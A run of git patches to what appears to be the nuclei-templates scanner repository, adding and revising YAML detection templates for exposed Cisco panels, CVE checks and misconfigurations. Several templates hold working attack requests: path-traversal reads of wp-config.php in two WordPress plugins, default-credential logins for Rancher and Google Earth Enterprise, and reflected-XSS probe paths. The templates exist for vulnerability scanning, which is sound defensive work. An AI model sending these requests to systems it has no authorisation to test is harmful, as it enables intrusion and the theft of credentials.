body - - - type: status - status: - - 200 - - - type: word - words: - - "text/html" - part: header From 896074f82e3a7f21ceb5f9d594c60faba3bf009d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 12 Oct 2021 16:27:23 +0530 Subject: [PATCH 2869/4083] Delete CVE-2021-34643.yaml --- cves/2021/CVE-2021-34643.yaml | 36 ----------------------------------- 1 file changed, 36 deletions(-) delete mode 100644 cves/2021/CVE-2021-34643.yaml diff --git a/cves/2021/CVE-2021-34643.yaml b/cves/2021/CVE-2021-34643.yaml deleted file mode 100644 index aa2ccb205f..0000000000 --- a/cves/2021/CVE-2021-34643.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2021-34643 - -info: - name: Skaut bazar < 1.3.3 - Reflected Cross-Site Scripting - author: dhiyaneshDK - severity: medium - reference: - - https://wpscan.com/vulnerability/c1b41276-b8fb-4a5c-bede-84ea62663b7a - tags: wordpress,cve,cve2021,wp-plugin - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-34643 - cwe-id: CWE-79 - description: "The Skaut bazar WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.3.2." - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/options-general.php/">/?page=skatubazar_option' - - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - - type: status - status: - - 200 - - - type: word - words: - - "text/html" - part: header From bd5b0e61938954701ca642b2a0b9d6d63354af69 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 12 Oct 2021 16:27:36 +0530 Subject: [PATCH 2870/4083] Delete CVE-2021-39322.yaml --- cves/2021/CVE-2021-39322.yaml | 36 ----------------------------------- 1 file changed, 36 deletions(-) delete mode 100644 cves/2021/CVE-2021-39322.yaml diff --git a/cves/2021/CVE-2021-39322.yaml b/cves/2021/CVE-2021-39322.yaml deleted file mode 100644 index ec373b8df3..0000000000 --- a/cves/2021/CVE-2021-39322.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2021-39322 - -info: - name: Easy Social Icons < 3.0.9 - Reflected Cross-Site Scripting - author: dhiyaneshDK - severity: medium - reference: - - https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58 - tags: wordpress,cve,cve2021,wp-plugin - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-39322 - cwe-id: CWE-79 - description: "The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path." - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/admin.php//?page=cnss_social_icon_page' - - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - - type: status - status: - - 200 - - - type: word - words: - - "text/html" - part: header From ac11d8fffd761e25bbe180887e3e4741aba36f33 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 12 Oct 2021 10:58:44 +0000 Subject: [PATCH 2871/4083] Auto Generated CVE annotations [Tue Oct 12 10:58:44 UTC 2021] :robot: --- cves/2021/CVE-2021-40868.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-40868.yaml b/cves/2021/CVE-2021-40868.yaml index ac23724b91..c688da0f0f 100644 --- a/cves/2021/CVE-2021-40868.yaml +++ b/cves/2021/CVE-2021-40868.yaml @@ -9,6 +9,11 @@ info: - https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2021-40868 tags: cve,cve2021,xss,cloudron + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-40868 + cwe-id: CWE-79 requests: - method: GET From 0e7c1e0a96c3bbf92f396d0d940349bfd84bf05b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 12 Oct 2021 16:41:08 +0530 Subject: [PATCH 2872/4083] Create cisco-ace-device-manager.yaml --- .../cisco/cisco-ace-device-manager.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/cisco/cisco-ace-device-manager.yaml diff --git a/exposed-panels/cisco/cisco-ace-device-manager.yaml b/exposed-panels/cisco/cisco-ace-device-manager.yaml new file mode 100644 index 0000000000..4526ed7920 --- /dev/null +++ b/exposed-panels/cisco/cisco-ace-device-manager.yaml @@ -0,0 +1,25 @@ +id: cisco-ace-device-manager + +info: + name: ACE 4710 Device Manager + author: dhiyaneshDk + severity: info + tags: panel,cisco + metadata: + shodan: 'html:"ACE 4710 Device Manager"' + +requests: + - method: GET + path: + - "{{BaseURL}}/index.vm" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "ACE 4710 DM - Login" + + - type: status + status: + - 200 From c7dc92a44642713e3df2d10a49ddfb6654426993 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 12 Oct 2021 16:49:46 +0530 Subject: [PATCH 2873/4083] Create cisco-secure-cn.yaml --- exposed-panels/cisco/cisco-secure-cn.yaml | 25 +++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/cisco/cisco-secure-cn.yaml diff --git a/exposed-panels/cisco/cisco-secure-cn.yaml b/exposed-panels/cisco/cisco-secure-cn.yaml new file mode 100644 index 0000000000..034c6857b0 --- /dev/null +++ b/exposed-panels/cisco/cisco-secure-cn.yaml @@ -0,0 +1,25 @@ +id: cisco-secure-cn + +info: + name: Cisco Secure CN + author: dhiyaneshDk + severity: info + tags: panel,cisco + metadata: + shodan: 'http.title:"Cisco Secure CN"' + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Cisco Secure CN" + + - type: status + status: + - 200 From 8d1832fee8d8ec5a2bb8a14675c5f0b23b306879 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 12 Oct 2021 17:05:09 +0530 Subject: [PATCH 2874/4083] Create rancher-default-login.yaml --- .../rancher/rancher-default-login.yaml | 52 +++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 default-logins/rancher/rancher-default-login.yaml diff --git a/default-logins/rancher/rancher-default-login.yaml b/default-logins/rancher/rancher-default-login.yaml new file mode 100644 index 0000000000..9eadc6d68c --- /dev/null +++ b/default-logins/rancher/rancher-default-login.yaml @@ -0,0 +1,52 @@ +id: rancher-default-login + +info: + name: Rancher Default Login + author: princechaddha + severity: high + description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes. + reference: https://github.com/rancher/rancher + tags: default-login,rancher,kubernetes,devops,cloud + +requests: + - raw: + - | + GET /v3/settings/first-login HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 + + - | + POST /v3-public/localProviders/local?action=login HTTP/1.1 + Host: {{Hostname}} + Cookie: CSRF={{csrf}} + X-Api-Csrf: {{csrf}} + Connection: close + Content-Length: 136 + + {"username":"{{username}}","password":"{{password}}","description":"UI Session","responseType":"cookie","labels":{"ui-session":"true"}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'R_SESS=token' + part: header + + extractors: + - type: regex + name: csrf + group: 1 + internal: true + part: header + regex: + - 'Set-Cookie: CSRF=([a-z0-9]+)' From aca00ef83b2a436a3b3ee832aeabd133b63363f7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 12 Oct 2021 17:05:47 +0530 Subject: [PATCH 2875/4083] Update rancher-panel.yaml --- exposed-panels/rancher-panel.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposed-panels/rancher-panel.yaml b/exposed-panels/rancher-panel.yaml index ecff09b49f..f7eae0a56f 100644 --- a/exposed-panels/rancher-panel.yaml +++ b/exposed-panels/rancher-panel.yaml @@ -4,6 +4,8 @@ info: name: Rancher Login Panel author: princechaddha severity: info + description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes. + reference: https://github.com/rancher/rancher tags: panel,rancher,kubernetes,devops,cloud requests: From 45c64fa1a02024ae2f688b9da9d1980dfba95cb3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 12 Oct 2021 18:05:13 +0530 Subject: [PATCH 2876/4083] Create cisco-edge-340.yaml --- exposed-panels/cisco/cisco-edge-340.yaml | 25 ++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/cisco/cisco-edge-340.yaml diff --git a/exposed-panels/cisco/cisco-edge-340.yaml b/exposed-panels/cisco/cisco-edge-340.yaml new file mode 100644 index 0000000000..53bf0929b2 --- /dev/null +++ b/exposed-panels/cisco/cisco-edge-340.yaml @@ -0,0 +1,25 @@ +id: cisco-edge-340 + +info: + name: Cisco Edge 340 + author: dhiyaneshDk + severity: info + tags: panel,cisco + metadata: + shodan: 'http.title:"Cisco Edge 340"' + +requests: + - method: GET + path: + - "{{BaseURL}}/auth/?next=%2F" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Cisco Edge 340" + + - type: status + status: + - 200 From b793ab1d8cf2c6a9967121101dc1ddd260644b9b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 12 Oct 2021 18:08:08 +0530 Subject: [PATCH 2877/4083] Create cisco-systems-login.yaml --- exposed-panels/cisco/cisco-systems-login.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/cisco/cisco-systems-login.yaml diff --git a/exposed-panels/cisco/cisco-systems-login.yaml b/exposed-panels/cisco/cisco-systems-login.yaml new file mode 100644 index 0000000000..ab274c92c5 --- /dev/null +++ b/exposed-panels/cisco/cisco-systems-login.yaml @@ -0,0 +1,25 @@ +id: cisco-systems-login + +info: + name: Cisco Systems Login + author: dhiyaneshDk + severity: info + tags: panel,cisco + metadata: + shodan: 'http.title:"Cisco Systems Login"' + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Cisco Systems Login" + + - type: status + status: + - 200 From 381647469e2b5c866e8c6dc7045efa162ceee7af Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 12 Oct 2021 18:14:47 +0530 Subject: [PATCH 2878/4083] Create cisco-telepresence.yaml --- exposed-panels/cisco/cisco-telepresence.yaml | 25 ++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/cisco/cisco-telepresence.yaml diff --git a/exposed-panels/cisco/cisco-telepresence.yaml b/exposed-panels/cisco/cisco-telepresence.yaml new file mode 100644 index 0000000000..16440be020 --- /dev/null +++ b/exposed-panels/cisco/cisco-telepresence.yaml @@ -0,0 +1,25 @@ +id: cisco-telepresence + +info: + name: Cisco Telepresence + author: dhiyaneshDk + severity: info + tags: panel,cisco + metadata: + shodan: 'http.title:"Cisco Telepresence"' + +requests: + - method: GET + path: + - "{{BaseURL}}/login.html" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Cisco TelePresence MCU - login:" + + - type: status + status: + - 200 From f9899590fe65ca17003efc54dc7e7d18940ead9d Mon Sep 17 00:00:00 2001 From: Zultan <43057246+ZultanH@users.noreply.github.com> Date: Wed, 13 Oct 2021 00:32:46 +1000 Subject: [PATCH 2879/4083] Create google-earth-enterprise-default-creds.yaml Checks for default credentials on a hosted google earth enterprise site --- ...google-earth-enterprise-default-creds.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 default-logins/google/google-earth-enterprise-default-creds.yaml diff --git a/default-logins/google/google-earth-enterprise-default-creds.yaml b/default-logins/google/google-earth-enterprise-default-creds.yaml new file mode 100644 index 0000000000..b4e79812e1 --- /dev/null +++ b/default-logins/google/google-earth-enterprise-default-creds.yaml @@ -0,0 +1,27 @@ +id: google-earth-default-login +info: + name: Google Earth Enterprise Default Login + author: orpheus, johnjhacking + severity: high + tags: default-login + +requests: + - raw: + - | + GET /admin/ HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + payloads: + username: + - geapacheuser + + password: + - geeadmin + + attack: pitchfork + + matchers-condition: and + matchers: + - type: status + status: + - 200 From a0c8be0fafe064147510a53c8c3dd2c339f92b68 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 12 Oct 2021 21:12:37 +0530 Subject: [PATCH 2880/4083] Update and rename google-earth-enterprise-default-creds.yaml to google-earth-dlogin.yaml --- ...erprise-default-creds.yaml => google-earth-dlogin.yaml} | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) rename default-logins/google/{google-earth-enterprise-default-creds.yaml => google-earth-dlogin.yaml} (82%) diff --git a/default-logins/google/google-earth-enterprise-default-creds.yaml b/default-logins/google/google-earth-dlogin.yaml similarity index 82% rename from default-logins/google/google-earth-enterprise-default-creds.yaml rename to default-logins/google/google-earth-dlogin.yaml index b4e79812e1..01e6f4155c 100644 --- a/default-logins/google/google-earth-enterprise-default-creds.yaml +++ b/default-logins/google/google-earth-dlogin.yaml @@ -1,9 +1,9 @@ -id: google-earth-default-login +id: google-earth-dlogin info: name: Google Earth Enterprise Default Login - author: orpheus, johnjhacking + author: orpheus,johnjhacking severity: high - tags: default-login + tags: default-login,google-earth requests: - raw: @@ -11,6 +11,7 @@ requests: GET /admin/ HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} + payloads: username: - geapacheuser From fcfcbea75da8dc9539981de58e7f4ac512c16268 Mon Sep 17 00:00:00 2001 From: Zultan <43057246+ZultanH@users.noreply.github.com> Date: Wed, 13 Oct 2021 02:03:30 +1000 Subject: [PATCH 2881/4083] Add extra string check --- default-logins/google/google-earth-dlogin.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/default-logins/google/google-earth-dlogin.yaml b/default-logins/google/google-earth-dlogin.yaml index 01e6f4155c..55ebfaee4d 100644 --- a/default-logins/google/google-earth-dlogin.yaml +++ b/default-logins/google/google-earth-dlogin.yaml @@ -26,3 +26,7 @@ requests: - type: status status: - 200 + - type: word + condition: and + words: + - 'DashboardPanel' From 7a0d96386a70ac7dbb1df0b1f01072f5b0275f77 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 12 Oct 2021 22:11:59 +0530 Subject: [PATCH 2882/4083] misc update --- default-logins/google/google-earth-dlogin.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/default-logins/google/google-earth-dlogin.yaml b/default-logins/google/google-earth-dlogin.yaml index 55ebfaee4d..a4dab4604a 100644 --- a/default-logins/google/google-earth-dlogin.yaml +++ b/default-logins/google/google-earth-dlogin.yaml @@ -1,9 +1,10 @@ id: google-earth-dlogin + info: name: Google Earth Enterprise Default Login author: orpheus,johnjhacking severity: high - tags: default-login,google-earth + tags: default-login,google requests: - raw: @@ -12,6 +13,7 @@ requests: Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} + attack: pitchfork payloads: username: - geapacheuser @@ -19,14 +21,12 @@ requests: password: - geeadmin - attack: pitchfork - matchers-condition: and matchers: - type: status status: - 200 - - type: word - condition: and + + - type: word words: - - 'DashboardPanel' + - 'DashboardPanel' \ No newline at end of file From 0102fad1a9facb410e60020ddf8a1b6017aaf184 Mon Sep 17 00:00:00 2001 From: Divya Date: Tue, 12 Oct 2021 18:11:25 -0400 Subject: [PATCH 2883/4083] Add hpe-system-management-anonymous.yaml Detect anonymous HPE System Management instance --- .../hpe-system-management-anonymous.yaml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 misconfiguration/hpe-system-management-anonymous.yaml diff --git a/misconfiguration/hpe-system-management-anonymous.yaml b/misconfiguration/hpe-system-management-anonymous.yaml new file mode 100644 index 0000000000..67f92c0a05 --- /dev/null +++ b/misconfiguration/hpe-system-management-anonymous.yaml @@ -0,0 +1,21 @@ +id: hpe-system-management-anonymous-access + +info: + name: HPE System Management Anonymous Access + author: divya_mudgal + severity: low + tags: hp,unauth,anonymous + +requests: + - method: GET + path: + - "{{BaseURL}}/chpstrt.php?chppath=Home" + + matchers-condition: and + matchers: + - type: word + condition: and + words: + - "username = \"hpsmh_anonymous\";" + - "var host_addr = '" + - "var ip_addr = '" \ No newline at end of file From da7d580ee63b2a067f260a3144f7c55510181c5b Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 13 Oct 2021 11:44:02 +0530 Subject: [PATCH 2884/4083] typo update --- .../{netscalar-aaa-login.yaml => netscaler-aaa-login.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename exposed-panels/{netscalar-aaa-login.yaml => netscaler-aaa-login.yaml} (84%) diff --git a/exposed-panels/netscalar-aaa-login.yaml b/exposed-panels/netscaler-aaa-login.yaml similarity index 84% rename from exposed-panels/netscalar-aaa-login.yaml rename to exposed-panels/netscaler-aaa-login.yaml index 1f8c66d7b3..c0b77f5fc7 100644 --- a/exposed-panels/netscalar-aaa-login.yaml +++ b/exposed-panels/netscaler-aaa-login.yaml @@ -1,7 +1,7 @@ -id: netscalar-aaa-login +id: netscaler-aaa-login info: - name: NetScalar AAA Login Panel + name: NetScaler AAA Login Panel author: dhiyaneshDk severity: info reference: https://www.exploit-db.com/ghdb/6898 From 233ca1fef9035f4e814c191c9159e91f2fe99b6d Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 13 Oct 2021 11:53:02 +0530 Subject: [PATCH 2885/4083] improved regex to handle more cases --- exposures/files/webpack-sourcemap-disclosure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/webpack-sourcemap-disclosure.yaml b/exposures/files/webpack-sourcemap-disclosure.yaml index 4cca2ba348..1ef3b1a173 100644 --- a/exposures/files/webpack-sourcemap-disclosure.yaml +++ b/exposures/files/webpack-sourcemap-disclosure.yaml @@ -31,4 +31,4 @@ requests: name: map group: 1 regex: - - "sourceMappingURL=([a-z0-9.]+).js.map" \ No newline at end of file + - "sourceMappingURL=([a-z-~0-9.]+).js.map" \ No newline at end of file From a3608c32f4b8b44f27f644e7cd9334fe2ad9ba19 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 13 Oct 2021 11:56:10 +0300 Subject: [PATCH 2886/4083] Add description --- vulnerabilities/other/netis-info-leak.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/netis-info-leak.yaml b/vulnerabilities/other/netis-info-leak.yaml index 9cfa7fac56..bb9688eb93 100644 --- a/vulnerabilities/other/netis-info-leak.yaml +++ b/vulnerabilities/other/netis-info-leak.yaml @@ -5,6 +5,7 @@ info: author: gy741 severity: medium reference: https://www.exploit-db.com/exploits/48384 + description: A vulnerability in Netis allows remote unauthenticated users to disclose the WiFi password of the remote device. tags: netis,exposure requests: From 708adea2856d7698adc05cefec9afac76f82b5a2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 13 Oct 2021 08:57:56 +0000 Subject: [PATCH 2887/4083] Auto Generated CVE annotations [Wed Oct 13 08:57:56 UTC 2021] :robot: --- cves/2021/CVE-2021-41773.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml index e82bbd6bef..430a5c5bb9 100644 --- a/cves/2021/CVE-2021-41773.yaml +++ b/cves/2021/CVE-2021-41773.yaml @@ -3,7 +3,7 @@ id: CVE-2021-41773 info: name: Apache 2.4.49 - Path Traversal and Remote Code Execution author: daffainfo - severity: critical + severity: high description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. reference: - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 @@ -12,6 +12,11 @@ info: - https://twitter.com/h4x0r_dz/status/1445401960371429381 - https://github.com/blasty/CVE-2021-41773 tags: cve,cve2021,lfi,rce,apache,misconfig + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-41773 + cwe-id: CWE-22 requests: - raw: From b86a98703055b179035e1d7c10a78fd1405a2770 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 13 Oct 2021 12:00:36 +0300 Subject: [PATCH 2888/4083] Dead link --- vulnerabilities/other/opensis-lfi.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/vulnerabilities/other/opensis-lfi.yaml b/vulnerabilities/other/opensis-lfi.yaml index c6e5e91adf..f7ca3af0a6 100644 --- a/vulnerabilities/other/opensis-lfi.yaml +++ b/vulnerabilities/other/opensis-lfi.yaml @@ -6,7 +6,6 @@ info: severity: high reference: - https://www.exploit-db.com/exploits/38039 - - https://www.securityfocus.com/bid/56598/info tags: opensis,lfi requests: From ab008edc5b00674633d11ca55842758b72c82bbb Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 13 Oct 2021 12:00:39 +0300 Subject: [PATCH 2889/4083] Add description --- vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml index 05bb45755f..efc4f25bce 100644 --- a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml +++ b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml @@ -4,6 +4,7 @@ info: name: Nginx Merge Slashes Path Traversal author: dhiyaneshDk severity: medium + description: A vulnerability in the remote Nginx server could cause the server to merge slashslash together causing what should have protected the web site from a directory traversal vulnerability into a vulnerable server. reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json - https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d From d5038b7520fd558732a35f93283b4a6063601a83 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 13 Oct 2021 12:00:55 +0300 Subject: [PATCH 2890/4083] Add description --- vulnerabilities/other/opensis-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/opensis-lfi.yaml b/vulnerabilities/other/opensis-lfi.yaml index f7ca3af0a6..5a4268b658 100644 --- a/vulnerabilities/other/opensis-lfi.yaml +++ b/vulnerabilities/other/opensis-lfi.yaml @@ -4,6 +4,7 @@ info: name: openSIS 5.1 - 'ajax.php' Local File Inclusion author: pikpikcu severity: high + description: An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible. reference: - https://www.exploit-db.com/exploits/38039 tags: opensis,lfi From 2e9613d75b160c9150aa081beb1b2de38114b6ae Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 13 Oct 2021 12:01:33 +0300 Subject: [PATCH 2891/4083] Improve description --- vulnerabilities/other/opensis-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/opensis-lfi.yaml b/vulnerabilities/other/opensis-lfi.yaml index 5a4268b658..f2584939c4 100644 --- a/vulnerabilities/other/opensis-lfi.yaml +++ b/vulnerabilities/other/opensis-lfi.yaml @@ -4,7 +4,7 @@ info: name: openSIS 5.1 - 'ajax.php' Local File Inclusion author: pikpikcu severity: high - description: An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible. + description: An attacker can exploit a vulnerability in openSIS to obtain potentially sensitive information and execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible. reference: - https://www.exploit-db.com/exploits/38039 tags: opensis,lfi From 10b4076f883e996e92c4a55b89d02b5e725845d5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 14 Oct 2021 00:14:29 +0530 Subject: [PATCH 2892/4083] misc update --- misconfiguration/hpe-system-management-anonymous.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/hpe-system-management-anonymous.yaml b/misconfiguration/hpe-system-management-anonymous.yaml index 67f92c0a05..13b5e6706b 100644 --- a/misconfiguration/hpe-system-management-anonymous.yaml +++ b/misconfiguration/hpe-system-management-anonymous.yaml @@ -4,7 +4,7 @@ info: name: HPE System Management Anonymous Access author: divya_mudgal severity: low - tags: hp,unauth,anonymous + tags: hp,unauth requests: - method: GET From 8c4b457222ce27b01d3c831db2222405deeefbf3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 14 Oct 2021 00:45:24 +0530 Subject: [PATCH 2893/4083] misc update --- default-logins/google/google-earth-dlogin.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/default-logins/google/google-earth-dlogin.yaml b/default-logins/google/google-earth-dlogin.yaml index a4dab4604a..4bcbc0a6e6 100644 --- a/default-logins/google/google-earth-dlogin.yaml +++ b/default-logins/google/google-earth-dlogin.yaml @@ -5,6 +5,8 @@ info: author: orpheus,johnjhacking severity: high tags: default-login,google + metadata: + shodan-dork: 'title:"GEE Server"' requests: - raw: @@ -28,5 +30,7 @@ requests: - 200 - type: word + condition: and words: - - 'DashboardPanel' \ No newline at end of file + - 'DashboardPanel' + - 'Earth Enterprise Server' \ No newline at end of file From 7c74065ff83af3a91dc733a6fc6fb5c329128ece Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 14 Oct 2021 00:46:20 +0530 Subject: [PATCH 2894/4083] adding reference --- default-logins/google/google-earth-dlogin.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/default-logins/google/google-earth-dlogin.yaml b/default-logins/google/google-earth-dlogin.yaml index 4bcbc0a6e6..9826c42eb0 100644 --- a/default-logins/google/google-earth-dlogin.yaml +++ b/default-logins/google/google-earth-dlogin.yaml @@ -5,6 +5,7 @@ info: author: orpheus,johnjhacking severity: high tags: default-login,google + reference: https://www.opengee.org/geedocs/5.2.2/answer/3470759.html metadata: shodan-dork: 'title:"GEE Server"' From adc062ff9e77a447375624424856421d26f9cd0c Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Thu, 14 Oct 2021 08:54:12 +0900 Subject: [PATCH 2895/4083] Create wp-cherry-plugin-file-download.yaml --- wp-cherry-plugin-file-download.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 wp-cherry-plugin-file-download.yaml diff --git a/wp-cherry-plugin-file-download.yaml b/wp-cherry-plugin-file-download.yaml new file mode 100644 index 0000000000..15172ced12 --- /dev/null +++ b/wp-cherry-plugin-file-download.yaml @@ -0,0 +1,26 @@ +id: wp-cherry-plugin-file-download + +info: + name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Download + author: 0x_Akoko + severity: high + tags: wordpress,wp-plugin,lfi,wp + reference: https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From 15acac63541343db4df05a974c4b36bfcb0fa797 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Thu, 14 Oct 2021 08:58:10 +0900 Subject: [PATCH 2896/4083] Create aspose-words-exporter-file-download.yaml --- aspose-words-exporter-file-download.yaml | 26 ++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 aspose-words-exporter-file-download.yaml diff --git a/aspose-words-exporter-file-download.yaml b/aspose-words-exporter-file-download.yaml new file mode 100644 index 0000000000..f75904a727 --- /dev/null +++ b/aspose-words-exporter-file-download.yaml @@ -0,0 +1,26 @@ +id: aspose-words-exporter-file-download + +info: + name: Aspose Words Exporter < 2.0 - Unauthenticated Arbitrary File Download + author: 0x_Akoko + severity: high + tags: wordpress,wp-plugin,lfi,wp + reference: https://wpscan.com/vulnerability/7869 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From b22eb1ba01cd9d673fe57cc9a2e8d01bbc291929 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 14 Oct 2021 08:37:46 +0700 Subject: [PATCH 2897/4083] Create CVE-2021-40978.yaml --- cves/2021/CVE-2021-40978.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2021/CVE-2021-40978.yaml diff --git 